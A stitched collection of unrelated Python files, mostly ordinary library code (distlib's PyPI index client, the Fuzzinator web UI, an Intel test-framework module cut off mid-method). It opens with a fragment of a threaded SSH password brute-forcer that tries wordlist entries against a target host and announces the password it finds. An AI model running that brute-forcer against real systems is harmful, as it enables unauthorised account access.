def ssh_connect(password, code=0):
global exit_tag
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target_ip, port=22, username=username, password=password)
exit_tag = 1
print(colored(f"\n[+]SSH Password For {username} found :> {password} {shield}\n", "green", attrs=['bold']))
os.system(f"notify-send 'Password Found::{password}'")
except:
print(colored(f"[!]Incorrect SSH password:> {password}", 'red'))
ssh.close()
ssh.close()
return code
if os.path.exists(password_file) == False:
print(colored("[!] File Not Found", 'red'))
sys.exit(1)
with open(password_file, 'r') as file:
for line in file.readlines():
if exit_tag == 1:
t.join()
exit()
password = line.strip()
t = threading.Thread(target=ssh_connect, args=(password,))
t.start()
time.sleep(0.2)
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input tmp specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
tmp to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed tmp.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed tmp.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded tmp
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-tmp; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-tmp; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-tmp; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
wui.py
|
# Copyright (c) 2019 Tamas Keri.
# Copyright (c) 2019-2021 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import logging
import os
import signal
import sys
from multiprocessing import Lock, Manager, Process, Queue
from pkg_resources import resource_filename
from rainbow_logging_handler import RainbowLoggingHandler
from tornado import ioloop, web
from ... import Controller
from .api_handlers import IssueAPIHandler, IssueReportAPIHandler, IssuesAPIHandler, JobAPIHandler, JobsAPIHandler, NotFoundAPIHandler, StatsAPIHandler
from .ui_handlers import ConfigUIHandler, IssueReportUIHandler, IssuesUIHandler, IssueUIHandler, NotFoundHandler, NotificationsHandler, StatsUIHandler
from .wui_listener import WuiListener
logger = logging.getLogger(__name__)
root_logger = logging.getLogger()
class Wui(object):
def __init__(self, controller, port, address, debug):
self.events = Queue()
self.lock = Lock()
# Main controller of Fuzzinator.
self.controller = controller
self.controller.listener += WuiListener(self.events, self.lock)
# Collection of request handlers that make up a web application.
handler_args = dict(wui=self)
self.app = web.Application([(r'/', IssuesUIHandler, handler_args),
(r'/issues/([0-9a-f]{24})', IssueUIHandler, handler_args),
(r'/issues/([0-9a-f]{24})/report', IssueReportUIHandler, handler_args),
(r'/stats', StatsUIHandler, handler_args),
(r'/configs/([0-9a-f]{9})(?:/([0-9a-f]{24}))?', ConfigUIHandler, handler_args),
(r'/notifications', NotificationsHandler, handler_args),
(r'/api/issues', IssuesAPIHandler, handler_args),
(r'/api/issues/([0-9a-f]{24})', IssueAPIHandler, handler_args),
(r'/api/issues/([0-9a-f]{24})/report', IssueReportAPIHandler, handler_args),
(r'/api/jobs', JobsAPIHandler, handler_args),
(r'/api/jobs/([0-9]+)', JobAPIHandler, handler_args),
(r'/api/stats', StatsAPIHandler, handler_args),
(r'/api/.*', NotFoundAPIHandler)],
default_handler_class=NotFoundHandler, default_handler_args=handler_args,
template_path=resource_filename(__name__, os.path.join('resources', 'templates')),
static_path=resource_filename(__name__, os.path.join('resources', 'static')),
autoreload=False, debug=debug)
# Starts an HTTP server for this application on the given port.
self.server = self.app.listen(port, address)
# List of opened WebSockets.
self.sockets = set()
# Share dict between processes.
self.jobs = Manager().dict()
def update_ui(self):
while True:
try:
event = self.events.get_nowait()
if hasattr(self, event['fn']):
getattr(self, event['fn'])(**event['kwargs'])
except Exception:
break
def register_ws(self, socket):
self.sockets.add(socket)
def unregister_ws(self, socket):
if socket in self.sockets:
self.sockets.remove(socket)
def stop_ws(self):
for socket in self.sockets:
socket.close()
def send_notification(self, action, data=None):
for socket in self.sockets:
socket.send_notification(action, data)
def on_job_added(self, type, **kwargs):
job = kwargs
job.update(type=type, status='inactive')
self.jobs[job['ident']] = job
self.send_notification('job_added', job)
def on_fuzz_job_added(self, **kwargs):
self.on_job_added('fuzz', **kwargs)
def on_reduce_job_added(self, **kwargs):
self.on_job_added('reduce', **kwargs)
def on_update_job_added(self, **kwargs):
self.on_job_added('update', **kwargs)
def on_validate_job_added(self, **kwargs):
self.on_job_added('validate', **kwargs)
def on_job_removed(self, **kwargs):
del self.jobs[kwargs['ident']]
self.send_notification('job_removed', kwargs)
def on_job_activated(self, **kwargs):
job = self.jobs[kwargs['ident']]
job.update(status='active')
self.jobs[kwargs['ident']] = job
self.send_notification('job_activated', kwargs)
def on_job_progressed(self, **kwargs):
job = self.jobs[kwargs['ident']]
job.update(progress=kwargs['progress'])
self.jobs[kwargs['ident']] = job
self.send_notification('job_progressed', kwargs)
def on_issue_added(self, **kwargs):
self.send_notification('issue_added')
self.send_notification('refresh_issues')
def on_issue_updated(self, **kwargs):
self.send_notification('refresh_issues')
def on_issue_invalidated(self, **kwargs):
self.send_notification('refresh_issues')
def on_issue_reduced(self, **kwargs):
self.send_notification('refresh_issues')
def on_stats_updated(self, **kwargs):
self.send_notification('refresh_stats')
def warning(self, ident, msg):
logger.warning(msg)
def execute(arguments):
if not root_logger.hasHandlers():
root_logger.addHandler(RainbowLoggingHandler(sys.stdout))
# The INFO level of Tornado's access logging is too chatty, hence they are
# not displayed on INFO level.
if root_logger.getEffectiveLevel() == logging.INFO:
logging.getLogger('tornado.access').setLevel(logging.WARNING)
logger.info('Server started at: http://%s:%d', arguments.bind_ip or 'localhost', arguments.port)
controller = Controller(config=arguments.config)
wui = Wui(controller, arguments.port, arguments.bind_ip, arguments.develop)
fuzz_process = Process(target=controller.run, args=(), kwargs={'max_cycles': arguments.max_cycles, 'validate': arguments.validate, 'reduce': arguments.reduce})
iol = ioloop.IOLoop.instance()
iol_clb = ioloop.PeriodicCallback(wui.update_ui, 1000)
try:
fuzz_process.start()
iol_clb.start()
iol.start()
except KeyboardInterrupt:
# No need to handle CTRL+C as SIGINT is sent by the terminal to all
# (sub)processes.
pass
except Exception as e:
# Handle every kind of WUI exceptions except for KeyboardInterrupt.
# SIGINT will trigger a KeyboardInterrupt exception in controller,
# thus allowing it to perform proper cleanup.
os.kill(fuzz_process.pid, signal.SIGINT)
logger.error('Unhandled exception in WUI.', exc_info=e)
else:
# SIGINT will trigger a KeyboardInterrupt exception in controller,
# thus allowing it to perform proper cleanup.
os.kill(fuzz_process.pid, signal.SIGINT)
finally:
wui.stop_ws()
iol_clb.stop()
iol.add_callback(iol.stop)
|
common3.py
|
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``common3.py``
`Testlib common functionality version 3.x`
"""
# Python built-in imports
import sys
import json
import os
import itertools
import traceback
from threading import Thread
import pytest
# Testlib imports
from .custom_exceptions import TAFCoreException
from . import entry_template
from . import environment
from . import loggers
VERSION = "3.0"
# Accessible from other modules list of loaded classes from dev_ files.
custom_classes = {}
# Add soft exit with environment sanitizing before exit.
def softexit(message, env=None):
"""Sanitizing environment and exit py.test execution.
Args:
message(str): Exit message
env(Environment): Environment instance
"""
if env is not None:
env.sanitize()
pytest.exit(message)
pytest.softexit = softexit
# Environment is inherited from dict to provide backward compatibility with TAFv1 suites
class Environment(dict):
"""Main class of all test environment.
Notes:
This class has to be used as base fixture in all test cases.
It provides number of common methods to initialize, shutdown,
cleanup environment functions which basically call appropriate methods of particular device classes.
"""
class_logger = loggers.ClassLogger()
def __init__(self, opts=None, **kwargs):
"""Read configuration files and create device objects.
Args:
opts(OptionParser): py.test config.option object which contains all py.test cli options.
Raises:
TAFCoreException: unexpected entry_type
"""
super(Environment, self).__init__(**kwargs)
self.opts = opts
self._dict = {}
self.config = self._get_conf(self.opts.env)
self.setup = {}
if self.opts.setup:
self.setup = self._get_setup(self.opts.setup)
# Map acroname to conf id
self.dut_map = {}
# Map config Id to instance index
self.id_map = {}
# Environment properties
self.env_prop = {}
# Device classes
self.__dev = {}
# Map autoname to conf Id
self.autoname_map = {}
# Get device classes
device_module_names = self._find_dev_modules()
self._import_device_modules(device_module_names)
# Make loaded classes from dev_ file accessible for other modules
for key, value in self.__dev.items():
custom_classes[key] = value
# Create env config according to setup
new_config = [self.create_conf_entry(setup_entry) for setup_entry in self.setup['env']]
# create a set from related ids lists
related_ids = set(itertools.chain.from_iterable(
conf_entry.get('related_id', []) for conf_entry in new_config))
# Add related config entries from environment config if they are not already in new_config
new_config_ids = set(_x['id'] for _x in new_config)
# find the unadded related_ids.
new_related_ids = related_ids - new_config_ids
related_configs = [
next(_e for _e in self.config if _e['id'] == rid) for rid in new_related_ids]
new_config.extend(related_configs)
# Save updated config
self.config = new_config
self.class_logger.info("Preparing environment objects.")
# reading and appending config and creating instances
for entry in self.config:
self.class_logger.info(
"Creating {0}:{1}:{2}".format(entry['entry_type'], entry['instance_type'],
entry['id']))
# Append related configs
if "related_id" in entry:
entry['related_conf'] = self._append_related_confs(entry['related_id'])
# Creating setup entries instances
try:
ename = self.__dev[entry['entry_type']]['NAME']
except KeyError:
message = ("Unexpected value for entry_type: '%s' specified with id: '%s' " +
"added in config.") % (entry['entry_type'], entry['id'])
raise TAFCoreException(message)
# always create a switch objects so that
# all the switch related plugins that expect a switch attribute
# fail gracefully
if not hasattr(self, "switch"):
setattr(self, "switch", {})
if not hasattr(self, ename):
setattr(self, ename, {})
eid = len(getattr(self, ename)) + 1
# Append ID maps
self.dut_map["%s%s" % (self.__dev[entry['entry_type']]['LINK_NAME'], eid)] = entry['id']
# Create entry instance
getattr(self, ename)[eid] = self.__dev[entry['entry_type']][entry['instance_type']](
entry, self.opts)
getattr(self, ename)[eid].env = self
self.id_map[entry['id']] = getattr(self, ename)[eid]
# In case entry contains autoname Environment object will contain d_<autoname>
# attribute.
if entry.get('autoname', False):
# Append autoname and Id
setattr(self, "d_{0}".format(entry['autoname']), getattr(self, ename)[eid])
self.autoname_map[entry['autoname']] = entry['id']
# Pass required by entries related objects:
for entry in self.config:
if "related_id" in entry:
self.id_map[entry['id']].related_obj = dict(
[(_id, self.id_map[_id]) for _id in entry['related_id']])
# To support heterogeneous setup we need to support multiple Cross connection types,
# but allow user to be independent from this.
# Cross object automatically detects connection owner and forward it to proper cross instance.
self.cross = Cross(self.setup, self)
# Append connections lists for cross entries.
if "cross" in self.setup:
for c_id in self.setup['cross']:
self.id_map[c_id].connections = self.setup['cross'][c_id]
# TODO: Add transparent support of multiple TG instances in one.
def _import_device_modules(self, device_module_names):
for mod_name in device_module_names:
self.class_logger.debug("Loading %s module...", mod_name)
try:
new_module = __import__("testlib." + mod_name, fromlist=[mod_name])
except ImportError:
self.class_logger.warning("failed to import %s", mod_name, exc_info=True)
# ignore modules that can't load, e.g. dependency problems such as tempest
# instead failed when we try to instantiate the class
continue
# insert into global namespace
globals()[mod_name] = new_module
if new_module.ENTRY_TYPE and new_module.ENTRY_TYPE not in self.__dev:
self.__dev[new_module.ENTRY_TYPE] = {
"NAME": new_module.NAME,
"LINK_NAME": getattr(new_module, 'LINK_NAME', new_module.NAME),
}
for instance_name, entry_class in new_module.INSTANCES.items():
if issubclass(entry_class, entry_template.GenericEntry):
self.class_logger.debug(
"Found entry_type {0}, instance_type {1}.".format(new_module.ENTRY_TYPE,
instance_name))
self.__dev[new_module.ENTRY_TYPE][instance_name] = entry_class
def create_conf_entry(self, setup_entry):
# Search for id in environment config
# Add environment entry in setup if it's found, or leave setup entry as is.
conf_entry = next(
(cfg_e for cfg_e in self.config if cfg_e['id'] == setup_entry['id']),
setup_entry)
# Updating env keys according to setup
conf_entry.update(setup_entry)
return conf_entry
def _find_dev_modules(self):
# extract this so we can override in unittests
devices = []
return devices
def _get_conf(self, file_name=None):
"""Load environment config from file.
Args:
file_name(str): Name of a json file with a test environment configuration.
Raises:
TAFCoreException: configuration file is not found
IOError: error on reading configuration file
Returns:
dict: dict of the selected configuration.
Notes:
This method shouldn't be used outside this class. Use "config" attribute to access environment configuration.
"""
if not file_name:
self.class_logger.info("Environment file isn't set. All configurations will be taken from setup file.")
# Return empty dict
return dict()
path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="env")
if not path_to_config:
message = "Specified configuration file %s not found." % (file_name, )
raise TAFCoreException(message)
try:
config = json.loads(open(path_to_config).read(), encoding="latin-1")
except:
message = "Cannot read specified configuration: %s" % (path_to_config, )
self.class_logger.error(message)
raise IOError(message)
return config
def _get_setup(self, file_name):
"""Reads setup file based on provided name.
Args:
file_name(str): Name of a json file with setup.
Raises:
TAFCoreException: setup file is not found
IOError: error on reading setup file
Returns:
list[dict]: setup json content.
"""
if not file_name:
message = "Setup name must be specified."
raise TAFCoreException(message)
path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="setup")
if not path_to_config:
message = "Cannot find given setup %s" % (file_name, )
raise TAFCoreException(message)
try:
setup = json.loads(open(path_to_config).read(), encoding='ascii')
except:
message = "Cannot read specified setup configuration: %s" % (path_to_config, )
self.class_logger.error(message)
raise IOError(message)
return setup
def _get_device_conf(self, device_id):
"""Return config entry by given Id if one, else return None.
Args:
device_id(str): Entry ID.
Returns:
dict: Entry config.
"""
return next((entry for entry in self.config if entry['id'] == device_id), None)
def id2instance(self, device_id):
"""Returns entry instance by device id.
Args:
device_id(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
Returns:
GenericEntry: Entry instance
Examples::
# by LINK_NAME
env.id2instance("sw1")
# by "autoname"
env.get_device_id("DEV2")
# by ID
env.get_device_id("9")
"""
dev_id = self.get_device_id(device_id)
entry = [e for e in self.config if e['id'] == dev_id][0]
instance = None
for _i in list(getattr(self, self.__dev[entry['entry_type']]['NAME']).values()):
if _i.id == dev_id:
instance = _i
break
return instance
def _append_related_confs(self, conf_ids):
"""Create dictionary with related device configurations.
Args:
conf_ids(list[str]): List of related config IDs.
Raises:
Exception: configuration is not found for specific device ID
Returns:
dict: Dictionary with related device configurations
"""
related_confs = {}
for device_id in conf_ids:
conf = self._get_device_conf(device_id)
if conf:
related_confs[device_id] = conf
else:
raise Exception("Configuration for device with id: %s not found." % device_id)
return related_confs
def safe_executor(self, obj, method, *args, **kwargs):
"""Invokes obj.method(*args, **kwargs) in try block and return error message with traceback.
Args:
obj(GenericEntry): Entry instance
method(str): method name that has to be executed
Returns:
str: Error message with traceback
Warning:
- Don't use in case obj.method has to return something.
- Don't use in case an exception has to be handled by py.test.
"""
try:
self.class_logger.debug("Perform %s(*%s, **%s) on entry_type=%s, id=%s" %
(method, args, kwargs, obj.type, obj.id))
getattr(obj, method)(*args, **kwargs)
except Exception:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback_message = traceback.format_exception(exc_type, exc_value, exc_traceback)
message = ("Error while call %s of entry_type=%s id=%s:\n%s" %
(method, obj.type, obj.id, "".join(traceback_message)))
self.class_logger.error(message)
return message
def parallelize(self, objects, method, safe=False):
"""Run objects method in multiple threads.
Args:
objects(list[GenericEntry]): list of device objects.
method(str): method name that has to be executed.
safe(bool): Hide exception raisings, but print log message.
Returns:
None
Examples::
objects = [env.lhost[1], env.lhost[2]]
env.parallelize(objects, "cleanup", False)
"""
threads = []
def executor(o, m):
return getattr(o, m)()
for obj in objects:
func = self.safe_executor if safe else executor
thread = Thread(target=func, args=(obj, method))
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def ordered_action(self, action, prio, entry_types):
"""Perform action on entries with type in entry_types and ordered by prio.
Args:
action(str): method name to execute.
prio(str): priority name to sort objects by.
entry_types(list[str]): entry types to apply action (apply action to all entry types if None).
Returns:
None
"""
# Select all types in case list isn't set.
if not entry_types:
entry_types = list(self.__dev.keys())
# Sort by start priorities
prio_dict = self._get_prio_dict(prio)
s_list = sorted(prio_dict.keys())
# Leave only selected entry types in prio_dict
for prio in prio_dict:
for item in prio_dict[prio][:]:
if self._get_device_conf(item.id)['entry_type'] not in entry_types:
prio_dict[prio].remove(item)
for _s in s_list:
if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
self.parallelize(prio_dict[_s], action)
else:
for obj in prio_dict[_s]:
self.class_logger.debug("Perform %s() on entry_type=%s, id=%s" %
(action, obj.type, obj.id))
getattr(obj, action)()
def _get_prio_dict(self, prio):
"""Return dict of entries by prio.
Args:
prio(str): Priority name to order dict by .
Returns:
dict: dict of lists where key = priority, value = list of device objects.
"""
prio_dict = {}
for _e in self.config:
# Set default prio value (0) in case it's not set.
_prio = _e[prio] if prio in _e else 0
# Create/append list od device objects with the same priority.
if _prio not in prio_dict:
prio_dict[_prio] = []
prio_dict[_prio].append(self.id_map[_e['id']])
return prio_dict
def initialize(self, entry_types=None):
"""Initialize test environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Initialize environment...")
self.ordered_action("create", "sprio", entry_types)
def cleanup(self, entry_types=None):
"""Cleaning environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Cleanup environment...")
self.ordered_action("cleanup", "cprio", entry_types)
def sanitize(self, entry_types=None):
"""Sanitizing environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Sanitizing environment...")
self.ordered_action("sanitize", "kprio", entry_types)
def check(self, entry_types=None):
"""Checking environment.
Args:
entry_types(list[str]): List of entry types
"""
self.class_logger.info("Check environment...")
self.ordered_action("check", "tprio", entry_types)
def shutdown(self, entry_types=None):
"""Stopping/Disconnecting environment.
Args:
entry_types(list[str]): List of entry types
Note:
This method cares to release all environment even an exception is raised during destroy process.
"""
# Keep all error messages and print them at the end.
# This object won't be append in case parallelize execution.
